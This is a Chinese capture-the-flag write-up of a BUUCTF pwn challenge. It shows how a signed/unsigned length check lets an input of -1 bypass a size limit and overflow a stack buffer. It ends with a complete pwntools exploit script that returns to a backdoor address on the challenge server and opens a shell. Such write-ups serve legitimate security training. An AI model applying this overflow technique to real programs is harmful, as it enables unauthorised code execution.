BUUCTF-PWN-bjdctf_2020_babyrop
首先查保护–>看链接类型–>赋予程序可执行权限–>试运行
64位程序,小端序
开启部分RELRO-----got表可写
未开启canary保护-----存在栈溢出
开启NX保护-----堆栈不可执行
未开启PIE-----程序地址为真实地址
动态链接
ida看一下主函数
char buf; // [rsp+0h] [rbp-10h]
.....
......
......
........
if ( (signed int)nbytes > 10 )
{
puts("Oops,u name is too long!");
exit(-1);
}
puts("[+]What's u name?");
read(0, &buf, (unsigned int)nbytes);
思路
这里nbytes是read函数输入的字符串大小,buf有0x10字节大小,而输入的nbytes如果大于10就会退出程序,注意观察发现存在整数溢出, (signed int)nbytes > 10 与read(0, &buf, (unsigned int)nbytes);
如果输入的nbytes二进制数最高位为1,有符号整形会把最高位当做标志位为负,除去最高位只要数不大于10即可跳过if的判断,然后执行read函数,发生栈溢出,查找一下有后门函数
exp
from pwn import *
context(os = 'linux',endian = 'little',log_level = 'debug',arch = 'amd64')
sh = remote('node4.buuoj.cn',29172)
system_addr = 0x40072A
sh.recvuntil('name:')
sh.sendline('-1')
sh.recvuntil('name?')
payload = flat(['a' * 0x18,system_addr])
sh.sendline(payload)
sh.interactive()
运行获得flag